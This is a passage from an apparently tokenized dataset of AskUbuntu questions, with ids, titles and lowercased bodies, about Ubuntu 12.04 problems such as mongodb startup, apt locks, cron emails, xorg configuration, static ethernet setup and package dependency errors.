video/flv ; video/mp2t ; video/mp4 ; video/mp4v-es ; video/mpeg ; video/msvideo ; video/ogg ; video/quicktime ; video/vivo ; video/vnd.divx ; video/vnd.rn-realvideo ; video/vnd.vivo ; video/webm ; video/x-anim ; video/x-avi ; video/x-flc ; video/x-fli ; video/x-flic ; video/x-flv ; video/x-m4v ; video/x-matroska ; video/x-mpeg ; video/x-ms-asf ; video/x-ms-asx ; video/x-msvideo ; video/x-ms-wm ; video/x-ms-wmv ; video/x-ms-wmx ; video/x-ms-wvx ; video/x-nsv ; video/x-ogm+ogg ; video/x-theora+ogg ; video/x-totem-stream ; audio/x-pn-realaudio ; audio/3gpp ; audio/ac3 ; audio/amr ; audio/amr-wb ; audio/basic ; audio/midi ; audio/mp2 ; audio/mp4 ; audio/mpeg ; audio/ogg ; audio/prs.sid ; audio/vnd.rn-realaudio ; audio/x-aiff ; audio/x-ape ; audio/x-flac ; audio/x-gsm ; audio/x-it ; audio/x-m4a ; audio/x-matroska ; audio/x-mod ; audio/x-mp3 ; audio/x-mpeg ; audio/x-ms-asf ; audio/x-ms-asx ; audio/x-ms-wax ; audio/x-ms-wma ; audio/x-musepack ; audio/x-pn-aiff ; audio/x-pn-au ; audio/x-pn-wav ; audio/x-pn-windows-acm ; audio/x-realaudio ; audio/x-real-audio ; audio/x-sbc ; audio/x-speex ; audio/x-tta ; audio/x-wav ; audio/x-wavpack ; audio/x-vorbis ; audio/x-vorbis+ogg ; audio/x-xm ; application/x-flac ; but it not works . i just ca n't get any thumbnail in nautilus . i thought the only change i made is the tryexec and exec path , and the new path contains a space , this maybe the problem , how can i fix it ? i 'm using 12.04 lts .
175406	mongodb suddenly stopped working today ( 12.04 )	after i updated to 12.04 a month or two ago i installed mongodb via apt . since that time it has worked well . i made no changes to the config or anything - it just worked out of the box . today it did n't start , when i logged on i suddenly had a `` could n't connect to any servers in the list '' error in my application and i checked and mongod was n't running . ls -al /var/lib/mongodb shows no *.lock files . $ /etc/init.d/mongodb start rather than invoking init scripts through /etc/init.d , use the service ( 8 ) utility , e.g . service mongodb start since the script you are attempting to invoke has been converted to an upstart job , you may also use the start ( 8 ) utility , e.g . start mongodb start : rejected send message , 1 matched rules ; type= '' method_call '' , sender= '' :1.89 '' ( uid=1000 pid=4284 comm= '' start mongodb `` ) interface= '' com.ubuntu.upstart0_6.job '' member= '' start '' error name= '' ( unset ) '' requested_reply= '' 0 '' destination= '' com.ubuntu.upstart '' ( uid=0 pid=1 comm= '' /sbin/init '' ) then i tried sudo mongod -- repair mon aug 13 12:16:48 [ initandlisten ] mongodb starting : pid=4350 port=27017 dbpath=/data/db/ 64-bit host=computer-localhost mon aug 13 12:16:48 [ initandlisten ] db version v2.0.4 , pdfile version 4.5 mon aug 13 12:16:48 [ initandlisten ] git version : nogitversion mon aug 13 12:16:48 [ initandlisten ] build info : linux yellow 2.6.24-29-server # 1 smp tue oct 11 15:57:27 utc 2011 x86_64 boost_lib_version=1_46_1 mon aug 13 12:16:48 [ initandlisten ] options : { repair : true } mon aug 13 12:16:48 [ initandlisten ] exception in initandlisten : 10296 dbpath ( /data/db/ ) does not exist , terminating mon aug 13 12:16:48 dbexit : mon aug 13 12:16:48 [ initandlisten ] shutdown : going to close listening sockets ... mon aug 13 12:16:48 [ initandlisten ] shutdown : going to flush diaglog ... mon aug 13 12:16:48 [ initandlisten ] shutdown : going to close sockets ... mon aug 13 12:16:48 [ initandlisten ] shutdown : waiting for fs preallocator ... mon aug 13 12:16:48 [ initandlisten ] shutdown : lock for final commit ... mon aug 13 12:16:48 [ initandlisten ] shutdown : final commit ... mon aug 13 12:16:48 [ initandlisten ] shutdown : closing all files ... mon aug 13 12:16:48 [ initandlisten ] closeallfiles ( ) finished mon aug 13 12:16:48 dbexit : really exiting now any idea what is wrong ? update so i tried sudo service mongodb start and it finally started ( i tried this several times before ) mongodb start/running , process 4376
175412	how can i get python stack trace information using gdb ?	i am using gdb to debug a segmentation fault in my python application on kubuntu 12.04 . supposedly gdb version 7 has built-in macros for extracting information about the python stack ( http : //docs.python.org/devguide/gdb.html ) , but i am having trouble getting it to work . i have installed python-dbg . when i ask for a python stack trace in gdb , the result looks like this : ( gdb ) py-bt # 5 ( unable to read python frame information ) # 16 ( unable to read python frame information ) # 26 ( unable to read python frame information ) ... my gdb version is 7.4-2012.04-0ubuntu2 , python is 2.7.3-0ubuntu3 .
175413	high ram eaters in ubuntu servers	actually what are the high ram eaters in ubuntu server , is there any such things ? i just want to know . if there , i want to remove them because i need to save ram . i will use different servers ( 3-4 ) and each one going to have its specific application .so remaining all services i do n't want to run .
175414	why `` fdisk -l '' does not give any output in terminal ?	when i do fdisk -l in terminal there is no output ? what can be the probable reason ? how to fix it ?
175415	second hdd not booting ubuntu 12.04	i have 2 hdds . both have 2 partitions . i have xp installed in the first hdd , and i installed 12.04 into second hdd by freeing half space of second partition of that hdd through `` something else '' option in livecd . i created all the ubuntu partitions as logical , so that half of it has ubuntu installed , and the rest half is accessible through xp . installation worked fine , and it asked for restart . i changed the boot order to second hdd , and it gives me ntldr not found error ctrl+alt+shift to restart error . i then inserted livecd , and tried to boot through it . after sometime , kernel panic : vfs : not syncing error . i ca n't boot into ubuntu in any way . help please .
175419	problem with graphics after suspend on gma500	i have a problem with suspend on ubuntu 12.04 running on my dell mini 1010 ( with a gma500 aka poulsbo graphics card ) . after suspend ( e.g . closing the lid ) , the graphics are corrupted as shown in this picture how can this be fixed ?
175421	stop the use of a block in ram	i 'm using ubuntu 12.04 , i noticed that some programs reboots unexpectedly so ran memtest86 i found that i have a error in the ram my question is : is there a way to stop the system from using that block of memory that gone bad or the only solution is the bay a new one
175422	why few commands ( eg : fdisk -l ) do not inform user `` you do not have privilege '' ?	few commands that need to do sudo remind you that `` you do not have the privilege '' or `` are you root ? '' etc . while a few commands do not give such message . for example , if you do fdisk -l instead of sudo fdisk -l ubuntu does not give any message . this is particularly confusing for people who come from different linux distro ( eg : centos , rhel etc. ) . would n't it be a good idea to notify user each time he commits such mistake , that he/she must be a sudoer to execute that particular command .
175425	update manager -	i 'm quit new to ubuntu and i still getting settled . but i came across an error that 's been bugging me . ca n't update failed to download repository information check your internet connection . detail : w : failed to fetch http- : //ppa.launchpad.net/ferramroberto/java/ubuntu/dists/precise/main/source/sources 404 not found , w : failed to fetch http- : //ppa.launchpad.net/ferramroberto/java/ubuntu/dists/precise/main/binary-i386/packages 404 not found , w : failed to fetch http- : //ppa.launchpad.net/unity-team/hud/ubuntu/dists/precise/main/source/sources 404 not found , w : failed to fetch http- : //ppa.launchpad.net/unity-team/hud/ubuntu/dists/precise/main/binary-i386/packages 404 not found , e : some index files failed to download . they have been ignored , or old ones used instead i 've seen some of this problems around but still ca n't find out what is wrong : / ( using 12.04 btw ) any help is really appreciated thanks in advance
175429	searching through odt documents without opening them ?	let 's say i have 2000 .odt files . their names are random numbers . how do i go about searching for , let 's say , `` pricing list '' ? how do i find the document i need without opening all of them one by one and checking to see if it 's the right one ? is there some program to search through the words in the documents without opening them ?
175430	why have to lock archives and dpkg while doing installing apps and updates .	actually if we suspend any application installing in middle or suspending updates then automatically while resuming we will get some problems like e : could not get lock /var/cache/apt/archives/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock directory /var/cache/apt/archives/ e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ? i know how to solve these things by removing lock . but i want to know why there is going to be a lock while performing updates/installation .
175438	redirect sound output to a specific port ... realtek ?	i am nearly as much of a noob about linux/ubuntu as one can be ... currently dual booting side-by-side with win 7 pro 64 bit . that being said ... system has a 5.1 surround sound card . the main regular port ( green ) used if you have one analog plug doesnt work properly with windows ... .realtek hd audio drivers provide a simple work around ... just plug said analog plug into another one of the 5.1 ports ( say , blue ) . then assign the port as `` front speakers '' . that works fine for windows 7 . how do i do the same reassignment/redirect for ubuntu ? i have no sound at this point and the computer is near inaccesible ( wires go through the floor to the basement where the computer is ) so switching cables back and forth isnt much of an option ... thanks in advance for any viable help .
175440	how to install software & addons in the ubuntu software store correctly ?	my questions is , `` i want to install a program from the ubuntu software store . i want to install the software `` monodevelop '' . i want to have the add-ons , except for the .net server ones , there is two . i want the rest of them . how do i install it correctly without errors , like no added addons . i want them added . would i have to install the program with out the add-ons first or do i have to click all the add-ons and then click apply and then install the program , or what is your plan of action toward doing this correct ? thank you . sincerely ronnie marlow
175442	shotwell/code : skript to remove raw 's of deleted jpg 's	when i import a nef file ( say , x.nef ) , shotwell automatically converts it to a jpg , naming it x_nef_shotwell.jpg . however , when i delete a picture in shotwell , it only removes the jpg-file and not the nef . the next time i start shotwell , it reimports the nef and generates another jpg . i think that problem can be solved easily with a script that checks whether a nef has a corresponding jpg of the described form and if that is n't case , deletes it . i do n't really know how to approach this , could you please help me ? thanks a lot , minamoto
175449	what types of vpn virtual servers allow to change default port ?	i 've pptp on ubuntu , and want to change the default listening port , but apparently there 's no option to do this . is there another vpn service that i can install and configure and change to any port i want ?
175452	hwclock , not in sync with system clock	my hardware clock keeps going out of sync . i set it to system time a few times , but it keeps going back to the 5hrs ahead state . is this normal ? could it make trouble ? how come my system clock is functioning properly when my hardware clock does n't ?
175453	plex media manager wo n't find /media/movies or /media/tv internal hdd	when i do a search for media in each of these drives ( which are loaded with movies and tv shows ) , plex does n't find anything . when i searched my music folder , it only found two artists ( and i have at least 20 ) . i am fairly new to ubuntu , and i am lost as to where to start . any ideas ? i am using ubuntu 12.04 64-bit .
175455	how to disable spotify indicator in the top panel ?	the spotify indicator icon clashes with the native unity theme , and is redundant , since it is already listed in the sound indicator menu . is there a way to remove or disable the spotify indicator ? or at least to change the icon ( could n't grep it on my filesystem ) . i am using the spotify `` preview '' with 12.04 . thanks !
175456	unity 3d rename workspaces ?	any good way to rename workspaces in unity 3d ( e.g . compiz ) ? back when i was running metacity ( e.g . old gnome 2 ) we could called them useful names like `` personal '' , `` work '' , `` development '' , `` media '' , etc .
175459	uninstall ubuntu full to windows	i recently installed ubuntu one for windows and now would like to uninstall it . problem is ; there is no uninstall.exe to be found , i have fully converted the harddrive any idea how to revert back to windows 7 ? i have a broken dvd driver aswell =/ so anything cd wise wouldnt help
175464	how to stop email report from cron < root @ machine > ( hourly )	i 'm running an ubuntu 12.04 , i 've configured `` ssmtp '' with my gmail account and now i 'm getting every hour an email with a report , this is an example : from : root < my @ gmail.com > date : 2012/8/13 subject : cron < root @ one > [ -x /usr/lib/php5/maxlifetime ] & & [ -d /var/lib/php5 ] & & find /var/lib/php5/ -depth -mindepth 1 -maxdepth 1 -type f -cmin + $ ( /usr/lib/php5/maxlifetime ) ! -execdir fuser -s { } 2 > /dev/null \ ; -delete to : root failed loading /usr/lib/php5/20090626/xdebug.so : /usr/lib/php5/20090626/xdebug.so : can not open shared object file : no such file or directory some more info : $ cat /etc/lsb-release distrib_id=ubuntu distrib_release=12.04 distrib_codename=precise distrib_description= '' ubuntu 12.04 lts '' more ... $ sudo crontab -l -u root no crontab for root more ... $ nano /etc/crontab # /etc/crontab : system-wide crontab # unlike any other crontab you do n't have to run the `crontab' # command to install the new version when you edit this file # and files in /etc/cron.d . these files also have username fields , # that none of the other crontabs do . shell=/bin/sh path=/usr/local/sbin : /usr/local/bin : /sbin : /bin : /usr/sbin : /usr/bin # m h dom mon dow user command 17 * * * * root cd / & & run-parts -- report /etc/cron.hourly 25 6 * * * root test -x /usr/sbin/anacron || ( cd / & & run-parts -- report /etc/cron.daily ) 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / & & run-parts -- report /etc/cron.weekly ) 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / & & run-parts -- report /etc/cron.monthly ) # i 've commented the line 17 * * * * root cd / & & run-parts -- report /etc/cron.hourly , but the email still arriving .
175465	using keyring restored from other system	i have recently had a severe hard disk failure and so had to rescue my keyring ( /home/username/.gnome2/keyrings ) from the failed disk . how should i go about copying said data to a new installation with the same password , but on a different disk ( it is a fresh installation , not a copy ) . will i need to somehow load the keyring in a different manner , or may i just copy said directory and operate upon it as normal ? again , the source and target are identical in version ( precise/12.04 ) , architecture ( both amd64 ) , and they have the same password .
175466	how do i install mupen64plus ?	i 'm new to ubuntu and linux and i just downloaded mupen64plus 1.99.5 and it came as a *.tar.gz file . i found some guides about how to install a .tar.gz file with the terminal but it does n't work . how can i install it ?
175468	how to link inserted images by default in libreoffice writer ?	i often have to deal with documents using multiple images -- as e.g . howtos , short documentations , or even books with many examples . always when i start a new document with libreoffice writer and insert the first pictures , they are embedded by default . i need them to be linked by default -- but could not find a suitable setting . can anybody tell me where that 's hidden ? i know it was possible with staroffice 8 , which i used before upgrading to ubuntu 12.04 . in other words ( to be clear from the beginning ) : how do i tell libreoffice to always default to link inserted images instead of embedding them ?
175476	google hangouts screensharing crashes	starting last week whenever i try to share my screen people see only blackness and when i try to remove screensharing the hangouts session hangs . when i reload the page i am usually told i need to re-install the plugin ( which i have done ) but it seems to start working again after a while . i am running a fully current version of ubuntu ( 12.04 with all the updates as of yesterday ) . i 'm not terribly linux-savvy so i do n't know what my next steps are here are the fairly unhelpful contents of my gtbplugin.log file [ 000:000 ] browser xembed support present : 1 [ 000:000 ] browser toolkit is gtk2 . [ 000:000 ] using gtk2 toolkit [ 000:018 ] starting client channel . [ 000:019 ] warning ( clientchannel.cc:435 ) : unreadable or no port file . could not initiate googletalkplugin connection [ 000:020 ] warning ( clientchannel.cc:410 ) : could not initiate googletalkplugin connection [ 000:020 ] googletalkplugin not running . starting new process ... [ 000:020 ] warning ( pluginutils.cc:260 ) : failed to get googletalkplugin path . trying default . [ 000:022 ] started googletalkplugin , path=/opt/google/talkplugin/googletalkplugin [ 000:022 ] waiting for googletalkplugin to start ... [ 000:427 ] starting client channel . [ 000:427 ] read port file , port=57985 [ 000:428 ] initiated connection to googletalkplugin [ 000:504 ] socket connection established [ 000:504 ] scheduleonlinecheck : online check in 5000ms [ 000:524 ] got cookie response , socket is authorized [ 000:524 ] authorized ; socket handshake complete [ 001:027 ] attempting to connect to googletalkplugin ... [ 001:027 ] read port file , port=57985 [ 001:027 ] initiated connection to googletalkplugin [ 001:027 ] socket connection established [ 001:027 ] scheduleonlinecheck : online check in 5000ms [ 001:109 ] got cookie response , socket is authorized [ 001:109 ] authorized ; socket handshake complete [ 005:525 ] handleonlinecheck : starting check [ 005:525 ] handleonlinecheck : ok ; current state : 3 [ 005:726 ] warning ( scriptinterface.cc:468 ) : we 're 10messages behind with js ; the browser may be hung . [ 006:027 ] handleonlinecheck : starting check [ 006:027 ] handleonlinecheck : ok ; current state : 3 [ 688:656 ] starting client channel . [ 688:661 ] read port file , port=57985 [ 688:663 ] initiated connection to googletalkplugin [ 688:864 ] socket connection established [ 688:864 ] scheduleonlinecheck : online check in 5000ms [ 688:965 ] got cookie response , socket is authorized [ 688:965 ] authorized ; socket handshake complete [ 693:890 ] handleonlinecheck : starting check [ 693:893 ] handleonlinecheck : ok ; current state : 3 edit : see this bug report as possibly relevant : http : //code.google.com/p/chromium/issues/detail ? id=106815
175478	where do you set keywords for applications in order to get them to show up in software center and dash searches ?	exactly as the title states , what fields do you modify in order to return an app for specific search terms in dash and software-center ? is it keywords in the applications .desktop file ? something in the debian packaging files ?
175481	ubuntu 12 gdm install remove problem	i installed gdm . then i removed it with : sudo apt-get remove gdm sudo apt-get purge gdm now i ca n't pass ubuntu logo at starup . how to enable lightdm back ? have tried sudo dpkg-reconfigure lightdm in curb but it not recognize command .
175486	is reboot the same as init 6 ?	is reboot the same as init 6 for ubuntu ? i 'm running ubuntu 12.04 on amazon ec2 . when ssh'ed into the box i can type runlevel and i get : n 2 looking at man reboot i see that : when called with -- force or when in runlevel 0 or 6 , this tool invokes the reboot ( 2 ) system call itself and directly reboots the system . otherwise this simply invokes the shutdown ( 8 ) tool with the appropriate arguments . if i read man shutdown 8 i see : shutdown arranges for the system to be brought down in a safe way . all logged-in users are notified that the system is going down and , within the last five minutes of time , new logins are prevented . my basic understanding about the difference between reboot and init 6 is : on other distros and perhaps older distros reboot would just unmount the disks and basically flick the power switch without running any shutdown scripts init 6 will run all of the shutdown scripts in /etc/init/rc . * as it reduces system 's runlevel on newer versions of ubuntu the reboot command without -- force or -f will run the shutdown command which does would basically do the same thing as init 6 it 's probably better to get in the habit of using init 6 instead of reboot as it is safer and would work better cross-distro , but the default behavior of reboot has been changed to try and prevent errors / dataloss if someone does use it . is that about right ? if not , what am i missing ?
175488	how to change button icon when button clicked , python quickly	i 'm trying to implement hide function in my application . what i want is to have this little arrow `` > '' when is hide and `` v '' when is visible . i know how to make it so its hides and shows but i need that little arrow to change whenever i click on it ... . i 'm using quickly and python to create my app . i tried set_icon_from_stock function but it returns error : attributeerror : 'toolbutton ' object has no attribute 'set_icon_from_stock' above example of arrow i talking about . thanks
175493	how do i remove these extra panels after enabling twinview ?	i tried to get twinview working but in the end all i got is this . on my way to twinview i have modified /etc/x11/xorg.conf but right know it looks like this . # nvidia-settings : x configuration file generated by nvidia-settings # nvidia-settings : version 295.33 ( buildd @ zirconium ) fri mar 30 13:43:34 utc 2012 section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' 0 0 inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' option `` xinerama '' `` 0 '' endsection section `` files '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' # horizsync source : edid , vertrefresh source : edid identifier `` monitor0 '' vendorname `` unknown '' modelname `` auo '' horizsync 30.0 - 75.0 vertrefresh 60.0 option `` dpms '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce 8600m gt '' endsection section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 option `` twinview '' `` 0 '' option `` metamodes '' `` dfp-0 : nvidia-auto-select +0+0 '' subsection `` display '' depth 24 endsubsection endsection seems like gnome thinks i have 5 screens connected , or something like that . does anyone know how to remove the additional panels ?
175495	what are the differences between linux-generic , linux-server and linux-virtual kernel packages ?	i 'm getting new vms built for development and staging environments , and was wondering whether there are compelling reasons for or against using the linux-virtual package on all of these images . do the -virtual kernels have different tuning ? do they have tools that make the suspend/wake-up better/safer ?
175500	why does ubuntu ignore my xorg.conf ?	hi my ubuntu has developed a strange problem . it just ignores my xorg setting and falls back to what i presume is a hardware default setting . in more detail when i do a clean install it automatically sets my resolution to 1920x1080i @ 60hz , i then change this to 1920x1080p @ 60hz but this causes the resolution to set its self to 1920x1080i @ 50hz after a reboot , and then no matter what i set the xorg to it always boots at this resolution . i can change the setting in the nvidia-settings dialog ( yes i have ran it as root ) but it never saves my setting and falls back to this resolution . heres some system spec : 2x p4ht @ 3ghz nvidia g force 310 via hdmi connected to a hd 1080p tv i really hope someone can help as this is a real pain . heres a link to my xorg set up for 1080p @ 50hz http : //paste.ubuntu.com/1146394/ thanks in advance ...
175503	are there any applications that map and show the health of the hard disc ?	i was wondering if there is an application that can tell us ( in an easily understandable way ... like in a chart ) how healthy our hard disc is . if the boot sector is healthy ... etc . thanks .
175507	how to use sudo command in the default guest account ?	how can i use sudo command from terminal in the default ubuntu 12.04 guest account , in order to connect to vpn client and service . ( openvpn+trustconnect+comodo ) i know it has been disable by default ( sudo ) , but i want to use guest account , apparmor , etc , and security feutures of guest account , and still be able to connect to vpn . vpn client and service wont star without sudo command .
175510	can not move anything in ubuntu 12.04	this is quite annoying . for some reason i can not hold anything with my mouse . for example . i can not drag a window by holding its title bar . i can not move the scroll bar of any window by mouse . i can not even select text alt+click on a window does not move it . all these tasks are related to dragging . and this dragging is not working . the problem steps are , left click anything but dont release it move the mouse now . at this time it 'll appear that you did n't left click earlier . so your mouse moves but no text is selected or not nothing is moved/dragged that you clicked earlier . update : this is a logitech wireless mouse . i also restarted and unplugged the usb wireless receiver and plugged it again . problem remains . i have n't edited compiz settings . in fact use default settings . never edited . before the problem arose , i had 3 video files opened with vlc player . 2 of them were playing at the same time .
175513	where can i get free apparmor profiles ?	apparmor profiles : security tight paranoic hardened very secure hard to hack , % 100 bullet proof ( last one a joke lol ) maybe a link .
175514	how to set java_home for openjdk ?	how can we set java_home environment variable for openjdk ?
175515	do e4rat and ureadahead have the same purpose ?	i have used e4rat before to speed up ubuntu . my understanding of it is that it moves files around on the disk to speed up boot times . however , i am also under the impression that ureadahead fulfills the same purpose . am i mistaken in their purposes , or are they redundant ? and if so , which should i use ? finally , is ureadahead a standard gnu component , or is it ubuntu-specific ?
175517	how to get windows 7 back on the grub menu list ?	i installed two os in my computer , 10.04 and windows 7 , after some mistakes , there is no windows 7 loader in the grub list , that is to say , i ca n't enter windows 7 , so what should i do ?
175521	how do i install programs in a ubuntu 12.04 live cd or live usb ?	ubuntu 12.04 live cd or live usb . how do i install programs . boot/os and ( optionally ) configuration [ in a tarball ] are stored on read-only media . any approach recommended ? maybe a good tool that would do the trick .
175526	how do i find the build dependencies of aircrack-ng ?	i have been trying for a day now to install a package thats given as source code and everything i have tried gives me errors and i would like to know if theres a way to look in the files or something other than looking on the internet or site of the program for dependencies .
175528	unable to install ubuntu 12.04 on new motherboard	our pc configuration is as follows : - asus maximus v extreme lga 1155 intel z77 hdmi sata 6gb/s usb 3.0 extended atx intel motherboard - intel core i7-3770s ivy bridge 3.1ghz ( 3.9ghz turbo ) lga 1155 65w quad-core desktop processor intel hd graphics 4000 bx80637i73770s windows 7 installation can proceed without any issues , but not ubuntu . i tried 11.10 and 12.04 both 32bit and 64bit , same issue . i have the bios settings to boot from cd drive . while booting , i get at the first screen with the little person and keyboard icons , then goes to ubuntu splash screen and stays there forever . only option is a hard reboot . can anyone share their experience with the motherboard i am using ? any suggestions for me to try ? thanks .
175530	blender wo n't save images	this should be a simple question . i am unable to save any images i render in blender . i set the output to be /home/john/pictures/binary.png , the image type to png , and checked the `` file extensions '' box . then when i press f12 ( or render > render image ) , there is nothing new in my pictures folder . i 've tried running blender using graphical root ( gksu ) , and it still wont let me save anything .
175531	what is a lightweight mail client with facility for calender ?	i need something that does repeat dates ( like in outlook ) so i can put my weekly schedule in and color code it . i have not found anything yet . i used to use thunderbird for the mail side of things , but was n't that keen . i am now using sylpheed for mail , but it is a little too limited for what i want , so i am hoping there is something else about . running lubuntu 12.04
175533	how do i make a syslinux file for an ubuntu partition that is not where syslinux is	sorry , i am a bit of an ubuntu and syslinux begginer , and i was just wondering where i can read some documentation using syslinux on ubuntu . what kind of search terms and sites should i use ?
175539	why does ubuntu keep logging me out ?	i 'm not sure what 's going on , but ubuntu keeps logging me out , each time i play long videos . not just when i play them , but specifically , when i jump around the video 2-4 times , or when i move the window around ... this happened to me before on this computer , so at one point i replaced the os with windows , and the problem disappeared ... now i decided to try ubuntu again , and the problem persists.. basically , what happens is that the video screen goes black , then the whole monitor goes black , and i find myself at the login screen , with my account logged out.. i 'd like to know what 's wrong , and any possible ways to stop this constant irritation ...
175540	how to set up simple static ethernet connection ?	system a has wi-fi internet access and an ethernet port , while system b has just an ethernet port . i connected the ports directly to each other . both are fairly modern desktop pcs running ubuntu 10.04 . on a i ran : $ sudo ip addr add 192.168.0.1/24 dev eth0 $ ip route 10.66.225.0/24 dev ra0 proto kernel scope link src 10.66.225.153 metric 2 192.168.0.0/24 dev eth0 proto kernel scope link src 192.168.0.1 169.254.0.0/16 dev ra0 scope link metric 1000 default via 10.66.225.1 dev ra0 proto static on b i ran : $ sudo ip addr add 192.168.0.2/24 dev eth0 however , when i now try to ping 192.168.0.2 from .1 , i get : $ ping 192.168.0.2 ping 192.168.0.2 ( 192.168.0.2 ) 56 ( 84 ) bytes of data . from 192.168.0.1 icmp_seq=1 destination port unreachable from 192.168.0.1 icmp_seq=2 destination port unreachable any hints ? tia .
175544	can i locally patch the fglrx package that comes from the ubuntu repositories ?	i 'm attempting to apt-get install fglrx while runnning a custom kernel , and the process is failing when it tries to compile the kernel module . i found a patch on the net that should take care of my problem . how do i apply it to a package fetched via apt-get ? i already know how to extract source files from amd 's install program , patch them , and create .deb packages . that 's not what i 'm asking here . i 'm not using amd 's installer . is there an apt cache somewhere ? can i edit it ? how do i tell dpkg to unpack a package so i can edit what 's inside ? how do i re-package it afterwards ? thanks !
175546	how to display chinese character ?	i have a csv file which contains english and chinese words , in xp i could open it with notepad++ and it displayed both without problem , but when i went to ubuntu 12.04 using gedit , it showed chinese char as bunch of garbage , what should i do to display correctly the chinese char in csv file ? background : the csv file is an export file from ant movie catalog , which contains movie titles in english & chinese , so when i tried to export to .amc format and imported into gcstar , it showed chinese titles as garbage , the same using xml export , when i tried to export to csv , it worked ( the csv file showed chinese char in xp ) , but when i tried to open it in ubuntu 12.04 using gedit , it showed garbage as well , so i have to fix it first before importing into gcstar . tia michael
175550	no ubuntu control panel in windows 7 installation	i installed 12.04 using the ubuntu installer for windows . i 'm able to boot into either os fine . i get the impression there 's supposed to be some kind of control panel for ubuntu in the windows controller center . there is no control panel , or program entry for ubuntu related applications , in my windows 7 . am i missing something ? searching online did n't turn up much .
175557	how do i set deluge to open .torrent files ?	in xubuntu , i ca n't locate deluge with the `` open with '' option . how can i associate deluge with .torrent files so it automatically opens them in deluge ?
175560	wacom graphics table shown but is not installed	on both my previous computer and this new one , `` wacom graphics tablet '' appeared in my hardware list . i do n't have this , never did . the common ( reused ) hardware is : - samsung clp300 printer - altec lansing speaker set - microtek scanmaker 4800 scanner so i guess something is being confused . i find the printer , but not the other two in the existing list . it seems unlikely that the speakers would confuse it , even though the settings are correct and can not be corrected . so maybe the scanner is confusing it ? however , the scanner seems to work ok . if i click on the tablet icon , it says `` not detected '' . now what ? thanks !
175562	netgear pcmcia wireless card drivers ?	i am thinking about purchasing a netgear wpn511 rangemax pcmcia wireless card ; but i was wondering -- is compatible with ubuntu 12.04 ? will i need to download drivers ; or are drivers for it already in 12.04 ? i just want find out so that i do n't get something i ca n't use .
175563	update manager crashed	when i tried to update ubuntu with the terminal i get the following error : e : malformed line 59 in source list /etc/apt/sources.list ( dist parse ) e : the list of sources could not be read ... what does this mean ? and how can i resolve this ? lucio : on the terminal i write sudo apt-get update web-e : after running cat /etc/apt/sources.list i get all the data of the sources.list ... the last ltwo ines ( 59 and 60 ) says like this deb http : //arechive.canonical.com/ precisepartner deb-src http : //arechive.canonical.com/ precisepartner
175571	why ca n't i install g++ ?	while trying to compile a program with the following command : g++ -o < output_file > < my_file.cpp > i found the following report ... . the program 'g++ ' can be found in the following packages : * g++ * pentium-builder try : sudo apt-get install < selected package > then i tried ... nawshad @ ubuntu : ~/thesis/codes/thesis_utility_function/test codes $ sudo apt-get install g++ reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : g++ : depends : g++-4.6 ( > = 4.6.3-1~ ) but it is not going to be installed libqt4-opengl : depends : libqtcore4 ( = 4:4.8.1-0ubuntu4.1 ) but 4:4.8.1-0ubuntu4 is to be installed depends : libqtgui4 ( = 4:4.8.1-0ubuntu4.1 ) but 4:4.8.1-0ubuntu4 is to be installed libqt4-svg : depends : libqtcore4 ( = 4:4.8.1-0ubuntu4.1 ) but 4:4.8.1-0ubuntu4 is to be installed depends : libqtgui4 ( = 4:4.8.1-0ubuntu4.1 ) but 4:4.8.1-0ubuntu4 is to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . but cant install due to unmet dependencies .
175577	how to install boost/lexical_cast.hpp in ubuntu 12.04	how can i install boost/lexical_cast.hpp in my ubuntu-12.04 ? does ubuntu 12.04 has default boost package installed ? if so , then how can i be able to see which version it is and what libraries are there in this package ?
175578	how can i remove kubuntu-desktop completely from ubuntu 12.04	i installed kde desktop on my ubuntu installation to try it and i like unity more and for space concerns i need to remove it . how to do so .
175590	how can i find `` firefox updates : '' option in `` firefox preferences > advanced > update '' tab	i 'm new for ubuntu , using firefox-11.0 in ubuntu-10.10 , recently i removed ffox-3.6 and installed ffox-11.0 from superuser . even i can n't find update options in firefox preferences > advanced > update ... there is no `` firefox updates : '' option , only there is automatically updates : search egnines . how can i find `` firefox updates : '' option in `` firefox preferences > advanced > update '' tab .
175591	linux and grub fix to load windows	my dvd drive is not working properly and i had formatted linux partition while upgrading . it fails due to media error and im thinking the grub file is deleted perhaps . i have windows 7 as other os . tell me how to boot from windows 7 without using dvd and with help of grub rescue ?
175593	conky not appearing on compiz wallpapers ?	i am running 12.04 and have followed the instructions here : is it possible to have a different background for each workspace ? to get a different wallpaper per workspace . it works by disabling nautilus ' drawing of the desktop and enables the compiz wallpaper plug-in . but since i 've done that my conky will not longer appear . here 's the relevant portion of it : background yes use_xft yes xftfont sans : size=10 xftalpha 0.9 update_interval 1.0 total_run_times 0 own_window yes own_window_type desktop own_window_title `` conky '' own_window_hints undecorated , below , sticky , skip_taskbar , skip_pager double_buffer yes minimum_size 180 5 maximum_width 200 draw_shades no draw_outline no draw_borders no draw_graph_borders no default_color white default_shade_color red default_outline_color green alignment top_right gap_x 12 gap_y 28 no_buffers yes uppercase no cpu_avg_samples 2 override_utf8_locale no
175596	how can i view the contents of `` /var/www '' in browser , like 'wamp ' in windows os ?	i 'm new for php . i 've installed apache , mysql , phpmyadmin in ubuntu 10.10 . is there any way to access the contents ( folder/files ) of /var/www in browser like 'wamp ' in windows os ?
